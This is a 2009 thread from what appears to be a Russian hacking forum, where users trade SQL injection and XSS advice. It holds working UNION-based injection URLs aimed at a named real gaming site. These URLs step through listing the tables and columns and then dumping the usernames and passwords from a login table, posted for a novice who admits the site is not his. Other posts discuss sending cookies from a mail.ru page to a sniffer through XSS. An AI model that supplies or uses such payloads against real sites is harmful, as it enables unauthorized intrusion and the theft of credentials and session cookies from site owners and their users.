 |
|
17.07.2009, 11:12
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
Сообщение от mailbrush
Staratel, изменять даных в инъекциях нельзя.
Поспорю...
В PostgreSQL injection можно исполнять команды... Следовательно можно и изменять информацию в БД (если прав хватит)
|
|
|
17.07.2009, 11:15
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
если скуля в update, insert, delete то можно изменять(в рамках запроса конечно же, и уязвимых переменных)
|
|
|
|
17.07.2009, 11:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
В PostgreSQL injection можно исполнять команды... Следовательно можно и изменять информацию в БД (если прав хватит)
И в MsSQL тоже, и еще в нескольких БД.
Я говорил про MySQL и про SELECT.
|
|
|
|
17.07.2009, 12:39
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
С нами:
9989667
Репутация:
240
|
|
Сообщение от Staratel
РЕБЯТА ПОМОГИТЕ ПОЖАЛУЙСТА!!!!!!!!!!!!!!!!!!!!!!!!
Покажите примерчик скл уязвы какой нить как в ней правильно изменить переменные
с update или другой..
Спасиба!
Код:
http://milw0rm.com/papers/149
прочти, может ето то, что ты искал;-) Ах да, погугли по милворму типа, add new user, insert, update, посмотри примеры в сплоитах.
Последний раз редактировалось The_HuliGun; 17.07.2009 в 12:43..
|
|
|
|
17.07.2009, 12:40
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами:
10262314
Репутация:
668
|
|
чтото не то =\\
провожу sql иньекцию ..када синтаксис не верен выводит ошибку синтаксиса .. а когда отправляю правильный запрос(с теми изменениями что мне нужны конечно) скрипт плюётся и выводит Invalid query: No database selected
в чём может быть трабл ? когда код без изменений( тоесть без иньекции) то всё норм работает =\\
пс и коментрии страно срабатывают ..
/* - работает только если его потом закрыть
-- работает странно както если сделать
union select 1,2,3,4((1='1 AND (ishidden=0))
он напишет
Код:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '((1='1') AND (ishidden=0))' at line 1
а если union select 1,2,3,4--((1='1 AND (ishidden=0))
напишет
Код:
Invalid query: Unknown column 'ishidden' in 'field list'
тоесть срабатывает как робел Оо
а # вще не срабатывает =\\
Последний раз редактировалось Doom123; 17.07.2009 в 13:01..
|
|
|
|
17.07.2009, 13:09
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
Сообщение от wolmer
http://torg.mail.ru/337/res/?p3[price_from]=&p3[price_to]=&p3[delivery_id]=&p3[vendor_id][]="> XSS
Собственно подставил ссылку на сниффер но не работает (точнее отчета лога нету) 
Попробуйте ща потестить на своем сниффере... если все норм то дайте ваш запрос чтобы куки просылались (я потом изменю на свой сниффер) Ап
|
|
|
|
17.07.2009, 13:24
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Doom123
1. это происходит когда в коде нет выбора БД перед запросом т.е. нет например такого
Код:
mysql_select_db('mysql');
, а сам sql запрос выглядит например так:
Код:
$sql = "SELECT Host,User,Password FROM mysql.`User` where max_questions=".$id;
т.е. при выборке в FROM указывается не только таблица, но и БД. Когда после этого ты ставишь union select ... from blabla ты не указываешь БД, и поэтому запрос возвращает ошибку что бд не выбрана.
2. 5 ветка требует закрытых /* коментов (как mssql) а перед и после -- должны стоять пробелы, и # в ГЕТ запросе нужно заменять на %23
__________________
Карфаген должен быть разрушен...
|
|
|
|
17.07.2009, 14:03
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 4
С нами:
8860716
Репутация:
0
|
|
где можно найти пароль? я узнал только логин отсюда:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+fr om+information_schema.tables+limit+23,1--
а пароль найти не могу, всего таблиц 27-28... помогите найти
п.с. я новичек, поэтому нетрогайте сайт дайте мне потренироваться...гыг
|
|
|
|
17.07.2009, 14:22
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
С нами:
9989667
Репутация:
240
|
|
Сообщение от blase-
где можно найти пароль? я узнал только логин отсюда:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+fr om+information_schema.tables+limit+23,1--
а пароль найти не могу, всего таблиц 27-28... помогите найти
п.с. я новичек, поэтому нетрогайте сайт дайте мне потренироваться...гыг
Так проще, узнал допустим таблицу:
Код:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name,table_schema),7,8,9,10,11+from+information_schema.tables+limit+23,1--
Узнал колонки:
Код:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,column_name),7,8,9,10,11+from+information_schema.columns+where+table_name=0x6C6F67696E+limit+0,1--
Достал информацию, которая тебе нужна:
Код:
_http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,psw),7,8,9,10,11+from+tgp_gamedb.login+limit+0,1--
А так, читай статьи, юзай SIPT.
Последний раз редактировалось The_HuliGun; 17.07.2009 в 14:51..
|
|
|
|
17.07.2009, 15:45
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
"><script>alert(document.cookie)</script> получается выполнить.
при подстановке ссылки на сниффер ничего не получается (проверено несколькими людьми), видимо что-то фильтруется.
короч ищи другую xss)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
